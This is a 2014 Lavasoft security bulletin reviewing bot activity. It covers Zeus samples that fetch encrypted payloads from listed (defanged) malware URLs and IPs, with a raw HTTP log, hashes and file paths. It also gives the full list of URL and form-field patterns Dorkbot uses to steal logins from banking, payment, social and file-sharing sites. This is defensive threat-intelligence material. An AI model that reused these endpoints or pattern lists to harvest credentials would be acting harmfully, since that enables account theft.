Lavasoft Security Bulletin - May 2014: Bot Review

Bot Review

Table: Bots under analysis (May 2014, Lavasoft MAS).


Bot's name April 2014 May 2014 Changes
Zbot 568 149 -51.3%
Cycbot 10 19 1.1%
Kelihos 68 472 49.4%
NrgBot/Dorkbot 149 169 2.4%
Blazebot/Rbot 5 2 -0.4%
Shiz 7 6 -0.1%
Total 807 818



Bot distribution in May:

Kelihos. This month we see a significant increase of Kelihos backdoors discovered in the Lab: 58% in May against 8% in April. You can read more about adoption of anti-analysis techniques by Kelihos bot here.

Cycbot. You can find the latest Cycbot description here.

Shiz. The latest description is here.

Zbot. Read more about Zeus variant found in May in Malware Encyclopedia. 30% of all detected Zeus samples use Tor client.

The Zeus continues downloading its files in an encrypted form:

URL IP
hxxp://highclassdelhiescorts.in/images/css/al0302.enc 103.8.127.189
hxxp://manjena.com/images/al0302.enc 184.107.194.106


This time the Canadian server replied with the ZZP file (329 288 bytes in size):

GET /images/al0302.enc HTTP/1.1
Accept: text/*, application/*
User-Agent: Updates downloader
Host: manjena.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Sat, 24 May 2014 06:00:28 GMT
Server: Apache/2.2.26 (Unix) mod_ssl/2.2.26 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.6
Last-Modified: Mon, 03 Feb 2014 15:36:31 GMT
ETag: "a548037-50648-4f18249ad9dc0"
Accept-Ranges: bytes
Content-Length: 329288
Connection: close
Content-Type: text/plain


ZZP..~.:.T.tS...W.......S..vS..OJ.)w_..w....Z...S...r... ...!...2..W0.
..<..w1...&...S..3....<D..}..}w.GwWF:..'T....X..3 Q..3...pl6.wT.
..U6.upP.x|.TM...p[6..S...0..HFo.w...;R..P[. %V.!wP..|R..w;.....C~...u
CD..V..d...wS..1R...P..qQ^".2..x....FB.qP..w.m.w{..q..usr..o.H...G@.F.

<<< skipped >>>

After decryption with Zeus decryption tool (ZeusDecryptor) we discovered usual randomly named application (MD5: f1f03b73b6c32ef28514d740073a4941, 386 560 bytes in size):

%Documents and Settings%\%current user%\Application Data\Idaz\ecyche.exe

The downloader also copies itself as “pdfupdate.exe” (MD5: 0a2947abe4c9e6d539066993690c8a38, 19 224 bytes in size) to the %Temp% folder and executes it.

NrgBot/Dorkbot. The number of Dorkbots continues growing since March. You can find the latest description here.

Currently the backdoor uses the following expressions to steal logins and passwords for popular services:

iknowthatgirl*/members*, *youporn.*/login*, *members.brazzers.com*, *bcointernacional*login*, *:2222/CMD_LOGIN*, *whcms*dologin* , *:2086/login*, *:2083/login*, *:2082/login*, *webnames.ru/*user_login*, Webnames, *dotster.com/*login*, loginid, *enom.com/login*, login.Pass, login.User, *login.Pass=*, *1and1.com/xml/config*, *moniker.com/*Login*, LoginPassword, LoginUserName, *LoginPassword=*, *namecheap.com/*login*, loginname, *godaddy.com/login*, Password, *Password=*, *alertpay.com/login*, *netflix.com/*ogin*, *thepiratebay.org/login*, *torrentleech.org/*login*, *vip-file.com/*/signin-do*, *sms4file.com/*/signin-do*, *letitbit.net*, *what.cd/login*, *oron.com/login*, *filesonic.com/*login*, *speedyshare.com/login*, *uploaded.to/*login*, *uploading.com/*login*, loginUserPassword, loginUserName, *loginUserPassword=*, *fileserv.com/login*, *hotfile.com/login*, *4shared.com/login*, txtpass, *txtpass=*, *netload.in/index*, *freakshare.com/login*, login_pass, *login_pass=*, *mediafire.com/*login*, *sendspace.com/login*, *megaupload.*/*login*, *depositfiles.*/*/login*, *signin.ebay*SignIn, *officebanking.cl/*login.asp*, *secure.logmein.*/*logincheck*, session[password], *password]=*, *twitter.com/sessions, txtPassword, *&txtPassword=*, *.moneybookers.*/*login.pl, *runescape*/*weblogin*, *&password=*, *no-ip*/login*, *steampowered*/login*, quick_password, *hackforums.*/member.php, *facebook.*/login.php*, *login.yahoo.*/*login*, passwd, login, *passwd=*, *login.live.*/*post.srf*, TextfieldPassword, *TextfieldPassword=*, *gmx.*/*FormLogin*, *Passwd=*, FLN-Password, *FLN-Password=*, *pass=*, *bigstring.*/*index.php*, *screenname.aol.*/login.psp*, password, loginId, *password=*, *aol.*/*login.psp*, Passwd, *google.*/*ServiceLoginAuth*, login_password, login_email, *login_password=*, *paypal.*/webscr?cmd=_login-submit*, *bebo.*/c/profile/comment_post.json, *bebo.*/mail/MailCompose.jsp*, *friendster.*/sendmessage.php*, *friendster.*/rpc.php, *vkontakte.ru/mail.php, *vkontakte.ru/wall.php, *vkontakte.ru/api.php, *facebook.*/ajax/*MessageComposerEndpoint.php*, msg_text, *facebook.*/ajax/chat/send.php*

We see the following online services attacked in the list above:

iknowthatgirl.com, youporn.com, brazzers.com, bancointernacional.com.ec, webnames.ru, dotster.com, enom.com, 1and1.com, moniker.com, namecheap.com, godaddy.com, alertpay.com, netflix.com, thepiratebay.org, torrentleech.org, vip-file.com, sms4file.com, letitbit.net, what.cd, oron.com, filesonic.com, speedyshare.com, uploaded.to, uploading.com, fileserv.com, hotfile.com, 4shared.com, netload.in, freakshare.com, mediafire.com, sendspace.com, megaupload.com, depositfiles.com, ebay.com, officebanking.cl, logmein.com, twitter.com, moneybookers.com, runescape.com, hackforums.com, facebook.com, yahoo.com, live.com, gmx.com, aol.com, google.com, paypal.com, bebo.com, friendster.com, vkontakte.ru, facebook.com

Among them we met porn websites, domain registrars, online banking services, file sharing services, online games, and popular social networks.

Blazebot/Rbot. The latest description is available in Malware Encyclopedia.

Read also:
Lavasoft Security Bulletin - May 2014: Top Threats.
Kelihos Adopts Anti-Analysis Technique.

  • Back to articles


  • Share this post:    Twitter Facebook
    x

    Our best antivirus yet!

    Fresh new look. Faster scanning. Better protection.

    Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

    For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

    Download adaware antivirus 12
    No thanks, continue to lavasoft.com
    close x

    Discover the new adaware antivirus 12

    Our best antivirus yet

    Download Now